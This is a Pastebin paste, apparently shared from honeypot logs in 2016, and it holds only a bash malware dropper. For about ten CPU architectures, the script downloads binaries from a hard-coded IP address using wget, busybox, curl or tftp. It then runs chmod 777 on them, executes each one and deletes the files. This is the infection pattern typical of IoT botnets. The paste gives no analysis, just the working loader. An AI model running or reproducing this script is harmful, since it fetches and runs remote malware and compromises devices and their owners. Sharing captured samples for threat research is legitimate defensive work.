Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-03-10 17:46

Mar 10th, 2016
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.11 KB | None | 0 0
  1. #!/bin/bash
  2. rm -f blj* blj*.* bljarmv4l bljarmv5l bljarmv6l blji586 blji686 bljm68k bljmips bljmipsel bljsh4 bljx86_64 blj.sh
  3. wget -q http://149.202.153.56/a/bljarmv4l || busybox wget -q http://149.202.153.56/a/bljarmv4l || curl -s -O http://149.202.153.56/a/bljarmv4l || tftp -r bljarmv4l -g 149.202.153.56
  4. wget -q http://149.202.153.56/a/bljarmv5l || busybox wget -q http://149.202.153.56/a/bljarmv5l || curl -s -O http://149.202.153.56/a/bljarmv5l || tftp -r bljarmv5l -g 149.202.153.56
  5. wget -q http://149.202.153.56/a/bljarmv6l || busybox wget -q http://149.202.153.56/a/bljarmv6l || curl -s -O http://149.202.153.56/a/bljarmv6l || tftp -r bljarmv6l -g 149.202.153.56
  6. wget -q http://149.202.153.56/a/blji586 || busybox wget -q http://149.202.153.56/a/blji586 || curl -s -O http://149.202.153.56/a/blji586 || tftp -r blji586 -g 149.202.153.56
  7. wget -q http://149.202.153.56/a/blji686 || busybox wget -q http://149.202.153.56/a/blji686 || curl -s -O http://149.202.153.56/a/blji686 || tftp -r blji686 -g 149.202.153.56
  8. wget -q http://149.202.153.56/a/bljm68k || busybox wget -q http://149.202.153.56/a/bljm68k || curl -s -O http://149.202.153.56/a/bljm68k || tftp -r bljm68k -g 149.202.153.56
  9. wget -q http://149.202.153.56/a/bljmips || busybox wget -q http://149.202.153.56/a/bljmips || curl -s -O http://149.202.153.56/a/bljmips || tftp -r bljmips -g 149.202.153.56
  10. wget -q http://149.202.153.56/a/bljmipsel || busybox wget -q http://149.202.153.56/a/bljmipsel || curl -s -O http://149.202.153.56/a/bljmipsel || tftp -r bljmipsel -g 149.202.153.56
  11. wget -q http://149.202.153.56/a/bljsh4 || busybox wget -q http://149.202.153.56/a/bljsh4 || curl -s -O http://149.202.153.56/a/bljsh4 || tftp -r bljsh4 -g 149.202.153.56
  12. wget -q http://149.202.153.56/a/bljx86_64 || busybox wget -q http://149.202.153.56/a/bljx86_64 || curl -s -O http://149.202.153.56/a/bljx86_64 || tftp -r bljx86_64 -g 149.202.153.56
  13. busybox chmod 777 blj*
  14. chmod 777 blj*
  15. ./bljarmv4l
  16. ./bljarmv5l
  17. ./bljarmv6l
  18. ./blji586
  19. ./blji686
  20. ./bljm68k
  21. ./bljmips
  22. ./bljmipsel
  23. ./bljsh4
  24. ./bljx86_64
  25. rm -f blj* blj*.* bljarmv4l bljarmv5l bljarmv6l blji586 blji686 bljm68k bljmips bljmipsel bljsh4 bljx86_64 blj.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement